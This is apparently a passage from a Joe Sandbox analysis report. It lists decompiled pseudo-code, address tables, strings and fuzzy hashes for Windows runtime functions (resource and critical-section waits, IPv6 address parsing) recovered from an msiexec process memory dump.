0x027514d6
0x027514da
0x027514de
0x027514e3
0x0275157a
0x0275157a
0x027514f1
0x027514f3
0x0277ea0f
0x00000000
0x0277ea15
0x00000000
0x0277ea15
0x027514f9
0x027514f9
0x027514fe
0x02751504
0x0277ea1a
0x0277ea1f
0x0277ea21
0x0277ea22
0x0277ea27
0x0277ea2a
0x0277ea2a
0x02751515
0x02751517
0x0275156d
0x02751572
0x02751575
0x02751575
0x0275151e
0x0277ea50
0x0277ea55
0x0277ea58
0x0277ea58
0x0275152e
0x02751531
0x02751533
0x00000000
0x02751535
0x02751541
0x02751549
0x02751549
0x02751533
0x027514f3
0x02751559

APIs

___swprintf_l.LIBCMT ref: 0277EA22

Part of subcall function 027513CB: ___swprintf_l.LIBCMT ref: 0275146B
Part of subcall function 027513CB: ___swprintf_l.LIBCMT ref: 02751490

___swprintf_l.LIBCMT ref: 0275156D

Strings

%%%u, xrefs: 02751564
]:%u, xrefs: 0277EA47

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: f5910cfbab866f2724a5b596e85a24608e9c4bdc087c5c2e5463c13c95dad4f9
Instruction ID: 7afe509b1bd5575553b4909eed7f4abd579deb6ab5fe5cec9bbc7d297d790c4d
Opcode Fuzzy Hash: f5910cfbab866f2724a5b596e85a24608e9c4bdc087c5c2e5463c13c95dad4f9
Instruction Fuzzy Hash: 6121C3729002399BDF21DE58CC44BEEB3BDAF10705F854451ED4AE3140EBB0EA598BE1

Uniqueness

Uniqueness Score: -1.00%

Function 027353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E027353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x027f01c0;
									_push(_t92);
									_push(0);
									_t37 = E0270F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02754FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02763F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02763F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0279217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02763F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02753915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02735384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0270F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02753915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0270F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02753915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0270F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02753915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E02735329(_t74, _t92);
													_push(1);
													return E027353A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x027353ab
0x027353ae
0x027353b1
0x027353b4
0x027353b7
0x027505b6
0x027505c0
0x027505c3
0x00000000
0x027505c9
0x027505c9
0x027505cc
0x027505d5
0x027505d5
0x027353bd
0x027353bd
0x027353bd
0x027353be
0x027353be
0x027353be
0x027353c0
0x00000000
0x00000000
0x02772269
0x0277226d
0x02772349
0x0277234d
0x02772273
0x02772276
0x02772279
0x0277227e
0x02772283
0x02772287
0x0277228a
0x0277228d
0x0277228f
0x027722bc
0x027722bc
0x027722bc
0x027722be
0x027722c4
0x027722cc
0x027722d0
0x027722d6
0x027722d7
0x027722da
0x027722df
0x027722e4
0x00000000
0x00000000
0x027722e6
0x027722e9
0x027722f4
0x027722f9
0x027722fa
0x02772305
0x02772314
0x02772319
0x0277231a
0x0277231d
0x02772320
0x02772323
0x02772323
0x02772328
0x0277232d
0x0277232f
0x02772331
0x02772336
0x02772336
0x0277233b
0x0277233d
0x02772350
0x02772351
0x02772356
0x02772359
0x02772359
0x0277235b
0x0277235d
0x02735367
0x0273536b
0x02735372
0x00000000
0x00000000
0x00000000
0x00000000
0x02772363
0x02772363
0x02772369
0x0277236a
0x0277236c
0x02772371
0x02772373
0x00000000
0x02772379
0x02772379
0x0277237a
0x0277237f
0x0277237f
0x02772385
0x02772386
0x02772389
0x0277238e
0x02772390
0x02735378
0x0273537c
0x02772396
0x02772396
0x02772397
0x0277239c
0x027723a2
0x027723a3
0x027723a6
0x027723ab
0x027723ad
0x00000000
0x027723b3
0x027723b3
0x027723b4
0x027723b9
0x027723ba
0x027723ba
0x027723bc
0x027723bf
0x00000000
0x00000000
0x02769153
0x02769158
0x0276915a
0x0276915e
0x02769160
0x00000000
0x02769166
0x02769166
0x02769171
0x02769176
0x02769176
0x00000000
0x02769160
0x027723c6
0x027723cb
0x027723d7
0x027723d7
0x027723ad
0x02772390
0x02772373
0x0277233f
0x0277233f
0x00000000
0x0277233f
0x02772291
0x02772291
0x02772293
0x02772295
0x0277229a
0x027722a1
0x027722a3
0x027722a7
0x027722a9
0x00000000
0x00000000
0x027722ab
0x027722ad
0x027722af
0x00000000
0x00000000
0x00000000
0x027722af
0x027722b1
0x027722b4
0x027722b4
0x027722b6
0x00000000
0x00000000
0x00000000
0x00000000
0x027722b6
0x0277228f
0x00000000
0x0277226d
0x027353cb
0x027353ce
0x027353d0
0x027353d4
0x027353d6
0x00000000
0x027353d8
0x027353e3
0x027353ea
0x027353ea
0x027353d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 027722F4

Strings

RTL: Resource at %p, xrefs: 0277230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 027722FC
RTL: Re-Waiting, xrefs: 02772328

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: f30a9c1c52847a290a426e174168d6350e3a1e3d89c08978b49335e60cc357e0
Instruction ID: 41beee4be2eab728d3cedc053a27c08e2b56ddc9d2e0420de24bc090c2d49f7e
Opcode Fuzzy Hash: f30a9c1c52847a290a426e174168d6350e3a1e3d89c08978b49335e60cc357e0
Instruction Fuzzy Hash: 165107B16007116BEF16DF28CC84FA773A9EF59728F114219FD19DB281EB61E8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0273EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0273EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0272DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x27f793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E027116C0(_t39);
				} else {
					_t40 = E0270F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02753915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E027101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x27f793c; // 0x0
								_push(_t85);
								_t44 = E02711F28(_t71);
							} else {
								_t44 = E0270F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02753915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02792306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0273EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02754FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02763F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02763F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x27f20c0;
								if(_t85 != 0x27f20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0279217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02763F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0273ec56
0x0273ec56
0x0273ec56
0x0273ec5c
0x0273ec64
0x027723e6
0x027723eb
0x027723eb
0x0273ec6a
0x0273ec6c
0x0273ec6f
0x027723f3
0x027723f8
0x027723fa
0x027723fc
0x0273ec75
0x0273ec76
0x0273ec76
0x0273ec7b
0x0273ec7c
0x0273ec7e
0x02772406
0x02772407
0x0277240c
0x0277240d
0x0277240d
0x0277240d
0x02772414
0x02772417
0x0277241e
0x02772435
0x02772438
0x0277243c
0x0277243f
0x02772442
0x02772443
0x02772446
0x02772449
0x02772453
0x02772455
0x0277245b
0x0277245b
0x0273eb99
0x0273eb99
0x0273eb9c
0x0273eb9d
0x0273eb9f
0x0273eba2
0x02772465
0x0277246b
0x0277246d
0x0273eba8
0x0273eba9
0x0273eba9
0x0273ebae
0x0273ebb3
0x0273ebb9
0x0273ebbb
0x02772513
0x02772514
0x02772519
0x0277251b
0x0273ec2a
0x0273ec2d
0x0273ec33
0x0273ec36
0x0273ec3a
0x0273ec3e
0x0273ec40
0x0273ec47
0x0273ec47
0x0273ec40
0x027122c6
0x0273ebc1
0x0273ebc1
0x0273ebc5
0x0273ec9a
0x0273ec9a
0x0273ebd6
0x0273ebd6
0x00000000
0x0273ebbb
0x02772477
0x0277247c
0x02772486
0x0277248b
0x02772496
0x0277249b
0x0277249d
0x027724a0
0x027724a3
0x027724aa
0x027724aa
0x027724a5
0x027724a5
0x027724a5
0x027724ac
0x027724af
0x027724b0
0x027724b3
0x027724b9
0x027724ba
0x027724bb
0x027724c6
0x027724cb
0x027724cd
0x027724d0
0x027724d1
0x027724d4
0x027724d6
0x027724d9
0x027724d9
0x027724dc
0x027724df
0x027724e1
0x027724e7
0x027724e9
0x027724ec
0x027724ef
0x027724f2
0x027724f2
0x027724ef
0x027724e7
0x027724fa
0x027724ff
0x02772501
0x02772503
0x02772506
0x0277250b
0x0273eb8c
0x0273eb93
0x00000000
0x00000000
0x0273eb93
0x00000000
0x0273eb99
0x0273ec85
0x0273ec85
0x0273ec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 027724BD
RTL: Re-Waiting, xrefs: 027724FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0277248D

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 18e94d010fb2808f1f540e3b3b2f209556317ad96556815c717460035d050e6c
Instruction ID: 74e062fe92d8a61807f89dbe9915cb5bcba8b13d4040fd688e540f3b5b286ed4
Opcode Fuzzy Hash: 18e94d010fb2808f1f540e3b3b2f209556317ad96556815c717460035d050e6c
Instruction Fuzzy Hash: 2E41E8B0600204AFDB21DF68CC89FAA77B9EF45720F108655FD65AB2C2D734E941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0274FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0274FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0274EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0274EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0274685D(_t167, 4) == 0) {
								if(E0274685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0274685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0274685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02728980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0271DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0274EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0274EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0274fcd1
0x0274fcd6
0x0274fcd9
0x0274fcdc
0x0274fcdf
0x0274fce2
0x0274fce5
0x0274fce8
0x0274fceb
0x0274fced
0x0274fced
0x0274fcf3
0x00000000
0x00000000
0x0274fcfc
0x0274fcfe
0x0274fdc1
0x0277ecbd
0x00000000
0x0277eccc
0x0277eccc
0x0277ecd2
0x00000000
0x00000000
0x0277ecdf
0x0277ece0
0x0277ece4
0x0277eceb
0x0277ecee
0x0277eca8
0x0277eca8
0x0277ecaa
0x0274fd76
0x0274fd79
0x0274fdb4
0x0274fdb5
0x0274fdb6
0x00000000
0x0274fdb6
0x0274fd7e
0x0277ecfc
0x0274fe2f
0x00000000
0x0274fe2f
0x0277ed08
0x0277ed0f
0x0277ed17
0x0277ed1b
0x00000000
0x0277ed1b
0x0274fd88
0x00000000
0x00000000
0x0274fd94
0x0274fd99
0x0274fda1
0x00000000
0x00000000
0x0274fdb0
0x00000000
0x0274fdb0
0x0277ecbd
0x0274fdc7
0x0274fdcb
0x00000000
0x0274fdd7
0x0274fde3
0x0274fe06
0x02761fe7
0x00000000
0x00000000
0x02761fef
0x02761ff0
0x02761ff4
0x02761ff7
0x02761ffa
0x02761ffd
0x02762000
0x00000000
0x00000000
0x0277ecf1
0x00000000
0x0277ecf1
0x00000000
0x0274fe06
0x0274fde8
0x0274fdec
0x0274fdef
0x0274fdf2
0x00000000
0x0274fdf2
0x0274fdcb
0x0274fd04
0x0274fd05
0x0277ec67
0x00000000
0x00000000
0x0277ec6f
0x00000000
0x0277ec6f
0x0274fd13
0x0274fd3c
0x0274fd40
0x0277ec75
0x0277ec7a
0x00000000
0x0277ec8a
0x0277ec8a
0x0277ec90
0x0277ecb2
0x0274fd73
0x0274fd73
0x00000000
0x0274fd73
0x0277ec95
0x00000000
0x00000000
0x0277eca1
0x0277eca4
0x0277eca5
0x00000000
0x0277eca5
0x0277ec7a
0x0274fd4a
0x00000000
0x0274fd6e
0x0274fd6e
0x0274fd71
0x00000000
0x0274fd71
0x0274fd4a
0x0274fd21
0x0275a3a1
0x00000000
0x0275a3a1
0x0274fd36
0x0276200b
0x02762012
0x00000000
0x00000000
0x02762018
0x00000000
0x02762018
0x00000000
0x0274fd36
0x0274fe0f
0x0274fe16
0x0275a3ad
0x00000000
0x00000000
0x0275a3b3
0x0275a3b3
0x0274fe1f
0x0277ed25
0x0277ed86
0x00000000
0x00000000
0x0277ed91
0x0277ed95
0x0277ed95
0x0277ed9a
0x0277edad
0x0277edb3
0x0277edba
0x0277edc4
0x0277edc9
0x00000000
0x0277edcc
0x0277ed2a
0x0277ed55
0x00000000
0x00000000
0x0277ed61
0x0277ed66
0x0277ed6e
0x00000000
0x00000000
0x0277ed7d
0x00000000
0x0277ed7d
0x0277ed30
0x00000000
0x00000000
0x0277ed3c
0x0277ed43
0x0277ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0274FD94

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: ade82580ae7b91a645fb3e938f70239dbed722a4e6980cb4f822df56ab48db7f
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
